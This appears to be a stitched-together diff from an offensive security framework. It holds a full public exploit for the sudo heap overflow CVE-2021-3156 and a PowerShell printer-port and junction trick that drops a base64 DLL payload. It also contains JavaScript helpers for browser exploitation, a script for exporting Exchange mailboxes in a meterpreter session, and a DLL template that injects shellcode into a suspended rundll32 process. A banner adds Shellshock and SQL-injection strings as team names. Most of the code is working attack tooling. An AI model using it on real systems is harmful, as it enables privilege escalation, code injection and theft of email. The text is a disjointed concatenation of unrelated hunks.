Remove-PrinterPort -Name JUNCTION_FILEPATH -ErrorAction SilentlyContinue | Out-Null
Add-PrinterDriver -Name "Generic / Text Only"
mkdir "JUNCTION_PATH" | Out-Null
Add-PrinterPort -Name JUNCTION_FILEPATH | Out-Null
Write-Host "[+] Added PrinterPort successfully on JUNCTION_FILEPATH"
Remove-Item -Recurse -Force JUNCTION_PATH -ErrorAction SilentlyContinue | Out-Null
New-Item -Type Junction -Path JUNCTION_PATH -Value DESTINATION_PATH | Out-Null
Write-Host "[+] Mount point created successfully on DESTINATION_PATH"
Add-Printer -Name "PRINTER_NAME" -DriverName "Generic / Text Only" -PortName "JUNCTION_FILEPATH" | Out-Null
$PE = [System.Convert]::FromBase64String('B64_PAYLOAD_DLL')
[IntPtr] $unmanaged = ([system.runtime.interopservices.marshal]::AllocHGlobal($pe.Length));
[system.runtime.interopservices.marshal]::Copy($PE, 0, $unmanaged, $PE.Length);
[Printer.RawPrinterHelper]::SendBytesToPrinter("PRINTER_NAME", $unmanaged, $PE.Length);
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+155
View File
@@ -0,0 +1,155 @@
/**
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
** ===========================================
**
** Exploit for that sudo heap overflow thing everyone is talking about.
** This one aims for singleshot. Does not fuck with your system files.
** No warranties.
**
** Shout outs to:
** Qualys - for pumping out the awesome bugs
** lockedbyte - for coop hax. (shared tmux gdb sessions ftw)
** dsc - for letting me rack up his electricity bill
** my wife - for all the quality time we had to skip
**
** Enjoy!
**
** -- blasty // 20210130
**/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>
#include <pty.h>
#include <termios.h>
#include <fcntl.h>
#include <libgen.h>
#include <sys/select.h>
#include <sys/wait.h>
// 512 environment variables should be enough for everyone
#define MAX_ENVP 512
#define SUDOEDIT_PATH "/usr/bin/sudoedit"
typedef struct {
char *name;
char *sudoedit_path;
uint32_t smash_len_a;
uint32_t smash_len_b;
uint32_t null_stomp_len;
uint32_t lc_all_len;
char *overwrite_path;
} target_t;
/* main from: https://github.com/blasty/CVE-2021-3156/blob/main/hax.c */
int exploit(int argc, char *argv[]) {
char *lib_path = "X/P0P_SH3LLZ_";
if (!((argc == 5) || (argc == 6))) {
return -1;
}
/* if an extra argument is specified, it is component of the library path to
* load that is overwritten and must be exactly 11 characters long
*/
if (argc == 6) {
if (strlen(argv[5]) != 11) {
return -1;
}
lib_path = argv[5];
}
target_t *target = NULL;
target = malloc(sizeof(target_t));
target->name = "Manual";
target->sudoedit_path = SUDOEDIT_PATH;
target->smash_len_a = atoi(argv[1]);
target->smash_len_b = atoi(argv[2]);
target->null_stomp_len = atoi(argv[3]);
target->lc_all_len = atoi(argv[4]);
target->overwrite_path = lib_path;
printf(
"using target: %s '%s' (%d, %d, %d, %d)\n",
target->name,
target->sudoedit_path,
target->smash_len_a,
target->smash_len_b,
target->null_stomp_len,
target->lc_all_len
);
char *smash_a = calloc(target->smash_len_a + 2, 1);
char *smash_b = calloc(target->smash_len_b + 2, 1);
memset(smash_a, '#', target->smash_len_a);
memset(smash_b, '#', target->smash_len_b);
smash_a[target->smash_len_a] = '\\';
smash_b[target->smash_len_b] = '\\';
char *s_argv[]={
"sudoedit", "-s", smash_a, "\\", smash_b, NULL
};
char *s_envp[MAX_ENVP];
int envp_pos = 0;
for(int i = 0; i < target->null_stomp_len; i++) {
s_envp[envp_pos++] = "\\";
}
s_envp[envp_pos++] = target->overwrite_path;
char *lc_all = calloc(target->lc_all_len + 16, 1);
strcpy(lc_all, "LC_ALL=C.UTF-8@");
memset(lc_all+15, 'C', target->lc_all_len);
s_envp[envp_pos++] = lc_all;
s_envp[envp_pos++] = NULL;
execve(target->sudoedit_path, s_argv, s_envp);
return 0;
}
int main(int argc, char *argv[]) {
int tty_fd;
pid_t pid = 0;
pid = forkpty(&tty_fd, NULL, NULL, NULL);
if (pid < 0) {
printf("forkpty(3) failed\n");
return -1;
} else if (pid == 0) {
/* need to set the working directory so the payload lib can be loaded from a relative path */
char *path = realpath(argv[0], NULL);
if (path) {
chdir(dirname(path));
free(path);
}
return exploit(argc, argv);
}
for (;;) {
char input;
char output;
fd_set read_fd;
FD_ZERO(&read_fd);
FD_SET(tty_fd, &read_fd);
FD_SET(STDIN_FILENO, &read_fd);
select(tty_fd + 1, &read_fd, NULL, NULL, NULL);
if (FD_ISSET(tty_fd, &read_fd)) {
if (read(tty_fd, &output, 1) != -1)
write(STDOUT_FILENO, &output, 1);
else
break;
}
}
return 0;
}
+1 -1
View File
@@ -456,7 +456,7 @@ static unsigned long find_cred() {
continue;
}
unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);
unsigned long test_uid = (read64(cred_struct + sizeof(int)) & 0xFFFFFFFF);
if(test_uid != uid) {
continue;
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -79,17 +79,41 @@ function Int64(v) {
return '0x' + hexlify(Array.from(bytes).reverse());
};
this.lo = function()
{
this.lo = function() {
var b = this.bytes();
return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
};
this.hi = function()
{
this.hi = function() {
var b = this.bytes();
return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
};
this.asInt32 = function() {
var value = new Int64(0);
for (var i = 0; i < 8; i++) {
if (i < 4) {
value.bytes[i] = this.bytes[i];
} else {
value.bytes[i] = 0;
}
}
return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
};
this.asInt16 = function() {
var value = new Int64(0);
for (var i = 0; i < 8; i++) {
if (i < 2) {
value.bytes[i] = this.bytes[i];
} else {
value.bytes[i] = 0;
}
}
return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
};
// Basic arithmetic.
// These functions assign the result of the computation to their 'this' object.
@@ -138,20 +162,44 @@ function Int64(v) {
}, 2);
// this = a ^ b
this.assignXor = operation(function sub(a, b) {
this.assignXor = operation(function xor(a, b) {
for (var i = 0; i < 8; i++) {
bytes[i] = a.byteAt(i) ^ b.byteAt(i);
}
return this;
}, 2);
// this = a & b
this.assignAnd = operation(function sub(a, b) {
this.assignAnd = operation(function and(a, b) {
for (var i = 0; i < 8; i++) {
bytes[i] = a.byteAt(i) & b.byteAt(i);
}
return this;
}, 2)
}, 2);
// this = a << b
this.assignShiftLeft = operation(function shiftLeft(a, b) {
for (var i = 0; i < 8; i++) {
if (i < b) {
bytes[i] = 0;
} else {
bytes[i] = a.byteAt(Sub(i, b).asInt32());
}
}
return this;
}, 2);
// this = a >> b
this.assignShiftRight = operation(function shiftRight(a, b) {
for (var i = 0; i < 8; i++) {
if (i < (8 - b)) {
bytes[i] = a.byteAt(Add(i, b).asInt32());
} else {
bytes[i] = 0;
}
}
return this;
}, 2);
}
// Constructs a new Int64 instance with the same bit representation as the provided double.
@@ -187,6 +235,16 @@ function And(a, b) {
return (new Int64()).assignAnd(a, b);
}
// Return a << b
function ShiftLeft(a, b) {
return (new Int64()).assignShiftLeft(a, b);
}
// Return a >> b
function ShiftRight(a, b) {
return (new Int64()).assignShiftRight(a, b);
}
// Some commonly used numbers.
Int64.Zero = new Int64(0);
Int64.One = new Int64(1);
@@ -64,8 +64,6 @@ function b2u32(b)
return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
}
function off2addr(segs, off)
{
if(!(off instanceof Int64)) off = new Int64(off);
@@ -138,47 +136,11 @@ function fsyms(mem, base, segs, want, syms)
return syms;
}
function strcmp(b, str)
{
var fn = typeof b == "function" ? b : function(i) { return b[i]; };
for(var i = 0; i < str.length; ++i)
{
if(fn(i) != str.charCodeAt(i))
{
return false;
}
}
return fn(str.length) == 0;
}
function _u32(i)
{
return b2u32(this.read(i, 4));
}
function _read(i, l)
{
if (i instanceof Int64) i = i.lo();
if (l instanceof Int64) l = l.lo();
if (i + l > this.length)
{
fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
}
return this.slice(i, i + l);
}
function _readInt64(addr)
{
return new Int64(this.read(addr, 8));
}
function _writeInt64(i, val)
{
if (i instanceof Int64) i = i.lo();
this.set(val.bytes(), i);
}
// Simplified version of the similarly named python module.
var Struct = (function() {
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,107 @@
#! /usr/bin/env python3
import cgi
import os,sys
import logging
import json
WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = "workload_log_{}.zip"
class LogFileJson:
""" Defines format to upload log file in harness
Arguments:
itrLogPath : log path provided by harness to store log data
logFileType : Type of log file defined in api.agentlogFileType
workloadID [OPTIONAL] : workload id, if log file is workload specific
"""
def __init__(self, itrLogPath, logFileType, workloadID = None):
self.itrLogPath = itrLogPath
self.logFileType = logFileType
self.workloadID = workloadID
def to_json(self):
return json.dumps(self.__dict__)
@classmethod
def from_json(cls, json_str):
json_dict = json.loads(json_str)
return cls(**json_dict)
class agentlogFileType():
""" Defines various log file types to be uploaded by agent
"""
WORKLOAD_ZIP_LOG = "workloadLogsZipFile"
try:
# TO DO: Puth path in some config
logging.basicConfig(filename="/etc/httpd/html/logs/uploader.log",filemode='a', level=logging.ERROR)
except:
# In case write permission is not available in log folder.
pass
logger = logging.getLogger('log_upload_wsgi.py')
def application(environ, start_response):
logger.debug("application called")
if environ['REQUEST_METHOD'] == 'POST':
post = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
keep_blank_values=True
)
# TO DO: Puth path in some config or read from config is already available
resultBasePath = "/etc/httpd/html/vpresults"
try:
filedata = post["logfile"]
metaData = post["logMetaData"]
if metaData.value:
logFileJson = LogFileJson.from_json(metaData.value)
if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))
if filedata.file:
if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
else:
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
with open(filePath, 'wb') as output_file:
while True:
data = filedata.file.read(1024)
# End of file
if not data:
break
output_file.write(data)
body = u" File uploaded successfully."
start_response(
'200 OK',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
except Exception as e:
logger.error("Exception {}".format(str(e)))
body = u"Exception {}".format(str(e))
elif environ['REQUEST_METHOD'] == 'OPTIONS':
PAYLOAD
body = u"Invalid request"
else:
logger.error("Invalid request")
body = u"Invalid request"
start_response(
'400 fail',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
+60
View File
@@ -0,0 +1,60 @@
%clr
*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*
*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*
*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*
*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*
*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*
*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*
*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*
*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*
*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*norbot*Delta Squad Zero*Mukesh*
*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*
*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*
*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*
*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*
*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*
*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*
*B0NG0R3* *Les Cadets Rouges*buf*
*Les Tontons Fl4gueurs* *404 : Flag Not Found*
*' UNION SELECT 'password* %bld%red _________ __ %clr *OCD247*Sparkle Pony*
*burner_herz0g* %bld%red \_ ___ \_____ _______/ |_ __ _________ ____ %clr *Kill$hot*ConEmu*
*here_there_be_trolls* %bld%red / \ \/\__ \ \____ \ __\ | \_ __ \_/ __ \ %clr *;echo"hacked"*
*r4t5_*6rung4nd4*NYUSEC* %bld%red \ \____/ __ \| |_> > | | | /| | \/\ ___/ %clr *karamel4e*
*IkastenIO*TWC*balkansec* %bld%red \______ (____ / __/|__| |____/ |__| \___ > %clr *cybersecurity.li*
*TofuEelRoll*Trash Pandas* %bld%red \/ \/|__| \/ %clr *OneManArmy*cyb3r_w1z4rd5*
*Astra*Got Schwartz?*tmux* %bld%red ___________.__ %clr *AreYouStuck*Mr.Robot.0*
*\nls*Juicy white peach* %bld%red \__ ___/| |__ ____ %clr *EPITA Rennes*
*HackerKnights* %bld%red | | | | \_/ __ \ %clr *guildOfGengar*Titans*
*Pentest Rangers* %bld%red | | | Y \ ___/ %clr *The Libbyrators*
*placeholder name*bitup* %bld%red |____| |___| /\___ > %clr *JeffTadashi*Mikeal*
*UCASers*onotch* %bld%red \/ \/ %clr *ky_dong_day_song*
*NeNiNuMmOk* %bld%red ___________.__ %clr *JustForFun!*
*Maux de tête*LalaNG* %bld%red \_ _____/| | _____ ____ %clr *g3tsh3Lls0on*
*crr0tz*z3r0p0rn*clueless* %bld%red | __) | | \__ \ / ___\ %clr *Phở Đặc Biệt*Paradox*
*HackWara* %bld%red | \ | |__/ __ \_/ /_/ > %clr *KaRIPux*inf0sec*
*Kugelschreibertester* %bld%red \___ / |____(____ /\___ / %clr *bluehens*Antoine77*
*icemasters* %bld%red \/ \//_____/ %clr *genxy*TRADE_NAMES*
*Spartan's Ravens* %bld%red _______________ _______________ %clr *BadByte*fontwang_tw*
*g0ldd1gg3rs*pappo* %bld%red \_____ \ _ \ \_____ \ _ \ %clr *ghoti*
*Les CRACKS*c0dingRabbits* %bld%red / ____/ /_\ \ / ____/ /_\ \ %clr *LinuxRiders*
*2Cr4Sh*RecycleBin* %bld%red / \ \_/ \/ \ \_/ \ %clr *Jalan Durian*
*ExploitStudio* %bld%red \_______ \_____ /\_______ \_____ / %clr *WPICSC*logaritm*
*Car RamRod*0x41414141* %bld%red \/ \/ \/ \/ %clr *Orv1ll3*team-fm4dd*
*Björkson*FlyingCircus* *PwnHub*H4X0R*Yanee*
*Securifera*hot cocoa* *Et3rnal*PelarianCP*
*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*
*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*
*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*
*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*
*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*
*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*
*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*
*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_noob*Ferris Wheel*Ficus*ONO*jameless*
*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*
*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*
*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*
*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*
*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*
*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*
*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*
@@ -0,0 +1,2 @@
HostingCLR*
!HostCLR*.dll
Binary file not shown.
+207
View File
@@ -0,0 +1,207 @@
# Wrapper around Write-Host, but surrounds the string with delimiters so that we can disregard spam output originating from RemoteExchange scripts
function Write-Output ( [string] $string ) {
$string = [string]::join("<br>",($string.Split("`r`n")))
# <output> is a placeholder delimiter, it is later replaced by the Ruby script
Write-Host "<output>$string</output>"
}
function Export-Mailboxes ([string] $mailbox, [string] $filter, [string] $path) {
# $path may arrive as a short path (C:\Users\ADMINI~1\...), but Exchange does not accept short paths.
# Get-Item is used to translate the short path to a full path.
$path_parent = Split-Path -Path $path -Parent
$path_leaf = Split-Path -Path $path -Leaf
$path_parent_full = (Get-Item -LiteralPath $path_parent).FullName
$path_full = Join-Path $path_parent_full $path_leaf
# Convert path to a UNC path
$path_drive = (Split-Path -Path $path_full -Qualifier)[0]
$path_rest = Split-Path -Path $path_full -NoQualifier
$unc_path = '\\localhost\' + $path_drive + '$' + $path_rest
Write-Output "Exporting mailbox..."
try {
if ($filter -eq "") {
# Don't use a filter
$export_req = New-MailboxExportRequest -Priority High -Mailbox $mailbox -FilePath $unc_path
} else {
# Use a filter
$export_req = New-MailboxExportRequest -Priority High -ContentFilter $filter -Mailbox $mailbox -FilePath $unc_path
}
}
catch {
$EM = $_.Exception.Message
Write-Output "Error exporting mailbox - New-MailboxExportRequest failed"
Write-Output "Exception message: '$EM'"
return
}
if ($export_req -eq $null) {
Write-Output "Error exporting mailbox - New-MailboxExportRequest returned null"
return
}
# Monitor the export job status
While ($true) {
$req_status = $export_req | Get-MailboxExportRequest
Write-Output ". $($req_status.Status)"
if ($req_status.Status -eq "Failed") {
Write-Output "Error exporting mailbox - Export job failed"
break
}
if ($req_status.Status -eq "Completed") {
Write-Output "Exporting done"
break
}
Start-Sleep -Seconds 1
}
$export_req | Remove-MailboxExportRequest -Confirm:$false
}
function List-Mailboxes {
# Don't throw exceptions when errors are encountered
$Global:ErrorActionPreference = "Continue"
$servers = Get-MailboxServer
foreach ($server in $servers) {
Write-Output "----------"
Write-Output "Server:"
Write-Output "- Name: $($server.Name)"
Write-Output "- Version: $($server.AdminDisplayVersion)"
Write-Output "- Role: $($server.ServerRole)"
Write-Output "-----"
Write-Output "Mailboxes:"
$mailboxes = Get-Mailbox -Server $server
foreach ($mailbox in $mailboxes) {
Write-Output "---"
Write-Output "- Display Name: $($mailbox.DisplayName)"
Write-Output "- Email Addresses: $($mailbox.EmailAddresses)"
Write-Output "- Creation date: $($mailbox.WhenMailboxCreated)"
Write-Output "- Address list membership: $($mailbox.AddressListMembership)"
$folderstats = $mailbox | Get-MailboxFolderStatistics -IncludeOldestAndNewestItems -IncludeAnalysis
if ($folderstats) {
$non_empty_folders = ( $folderstats | ? {$_.ItemsInFolder -gt 0 })
if (!($non_empty_folders)) {
Write-Output "- (All folders are empty)"
} else {
Write-Output "- Folders:"
foreach ($folderstats in $non_empty_folders) {
$output_string = "-- Path $($folderstats.FolderPath), Items $($folderstats.ItemsInFolder), Size $($folderstats.FolderSize)"
if ($folderstats.NewestItemReceivedDate) {
$output_string += ", Newest received date $($folderstats.NewestItemReceivedDate)"
}
Write-Output "$output_string"
}
}
}
}
}
}
function Ensure-Role ([string] $user, [string] $role) {
$assignments = Get-ManagementRoleAssignment -Role $role -RoleAssignee $user -Delegating $false
if (!($assignments)) {
Write-Output "User not assigned to role $role - Assigning now"
New-ManagementRoleAssignment -Role $role -User $user
}
}
function Check-Permission {
try {
$Current_Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$Groups = Get-ADPrincipalGroupMembership -identity $Current_Identity.User
}
catch {
$EM = $_.Exception.Message
Write-Output "Error getting the current user's Active Directory group membership"
Write-Output "Exception message: '$EM'"
return $false
}
return [bool] ( $Groups | ? {$_.samAccountName -eq "Organization Management" })
}
function Assign-Roles {
$Current_Username = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# Ensure the current user has the following roles, required for the New-MailboxExportRequest cmdlet
Ensure-Role $Current_Username "Mailbox Search"
Ensure-Role $Current_Username "Mailbox Import Export"
}
function Get-RemoteExchangePath {
# Get the path of the RemoteExchange.ps1 script
$Path = $env:ExchangeInstallPath
if (!$Path -Or !(Test-Path $Path)) {
$Path = Join-Path $env:ProgramFiles 'Microsoft\Exchange Server\V15\'
if (!(Test-Path $Path)) {
$Path = Join-Path $env:ProgramFiles 'Microsoft\Exchange Server\V14\'
if (!(Test-Path $Path)) {
return $null
}
}
}
$RemoteExchangePath = Join-Path $Path 'Bin\RemoteExchange.ps1'
if (!(Test-Path $RemoteExchangePath)) {
return $null
}
return $RemoteExchangePath
}
# Need to set this in order to catch errors raised by RemoteExchange as exceptions
$Global:ErrorActionPreference = "Stop"
$RemoteExchangePath = Get-RemoteExchangePath
if (!($RemoteExchangePath)) {
Write-Output "Couldn't find RemoteExchange PowerShell script"
return
}
try {
Import-Module $RemoteExchangePath
}
catch {
$EM = $_.Exception.Message
Write-Output "Error loading the RemoteExchange PowerShell script"
Write-Output "Exception message: '$EM'"
return
}
try {
Connect-ExchangeServer -auto
}
catch {
$EM = $_.Exception.Message
Write-Output "Error connecting to Exchange server"
Write-Output "Exception message: '$EM'"
return
}
try {
# There's a bug in Exchange 2010 that requires running an Exchange cmdlet before an AD cmdlet, otherwise the script won't work.
# For this reason, we run Get-Mailbox here and disregard its output.
Get-Mailbox | Out-Null
if (!(Check-Permission)) {
Write-Output "Permission check failed, current user must be assigned to the Organization Management role group"
return
}
_COMMAND_
}
catch [System.Management.Automation.CommandNotFoundException] {
Write-Output "A CommandNotFoundException was thrown - Some Exchange Management Shell are unavailable. This is most likely due to insufficient credentials in meterpreter session"
}
catch {
$EM = $_.Exception.Message
Write-Output "Aborting, caught an exception"
Write-Output "Exception message: '$EM'"
}
+14
View File
@@ -0,0 +1,14 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj
move *.dll ..\..\..
-24
View File
@@ -1,24 +0,0 @@
#
# XXX: NOTE: this will only compile the x86 version.
#
# To compile the x64 version, use:
# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
#
if [ -z "$PREFIX" ]; then
PREFIX=i586-mingw32msvc
fi
rm -f *.o *.dll
$PREFIX-gcc -c template.c
$PREFIX-windres -o rc.o template.rc
$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
rm -f junk.tmp
$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp --def template.def
rm -f base.tmp
$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
rm -f temp.exp
$PREFIX-strip template_x86_windows.dll
rm -f *.o
+97 -61
View File
@@ -5,11 +5,10 @@
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
#endif
@@ -20,82 +19,119 @@ void ExecutePayload(void);
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
}
// Use a combination semaphore / event to check if the payload is already running and when it is, don't start a new
// instance. This is to fix situations where the DLL is loaded multiple times into a host process and prevents the
// payload from being executed multiple times. An event object is used to determine if the payload is currently running
// in a child process. The event handle is created by this process (the parent) and configured to be inherited by the
// child. While the child process is running, the event handle can be successfully opened. When the child process exits,
// the event handle that was inherited from the parent will be automatically closed and subsequent calls to open it will
// fail. This indicates that the payload is no longer running and a new instance can be created.
BOOL Synchronize(void) {
BOOL bResult = TRUE;
BOOL bRelease = FALSE;
HANDLE hSemaphore = NULL;
HANDLE hEvent = NULL;
SECURITY_ATTRIBUTES SecurityAttributes;
// step 1: define security attributes that permit handle inheritance
SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = TRUE;
do {
// step 2: create a semaphore to synchronize this routine
if ((hSemaphore = CreateSemaphoreA(&SecurityAttributes, 1, 1, szSyncNameS)) == NULL) {
// if the semaphore creation fails, break out using the default TRUE result, this shouldn't happen
break;
}
bResult = FALSE;
// step 3: acquire the semaphore, if the operation timesout another instance is already running so exit
if (WaitForSingleObject(hSemaphore, 0) == WAIT_TIMEOUT) {
break;
}
bRelease = TRUE;
// step 4: check if the event already exists
if (hEvent = OpenEventA(READ_CONTROL | SYNCHRONIZE, TRUE, szSyncNameE)) {
// if the event already exists, do not continue
CloseHandle(hEvent);
break;
}
// step 5: if the event does not already exist, create a new one that will be inherited by the child process
if (hEvent = CreateEventA(&SecurityAttributes, TRUE, TRUE, szSyncNameE)) {
bResult = TRUE;
}
} while (FALSE);
// step 6: release and close the semaphore as necessary
if (hSemaphore) {
if (bRelease) {
ReleaseSemaphore(hSemaphore, 1, NULL);
}
CloseHandle(hSemaphore);
}
// *do not* close the event handle (hEvent), it needs to be inherited by the child process
return bResult;
}
void ExecutePayload(void) {
int error;
int error;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot;
LPVOID ep;
LPVOID ep;
// Start up the payload in a new process
inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
if (Synchronize()) {
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if (CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
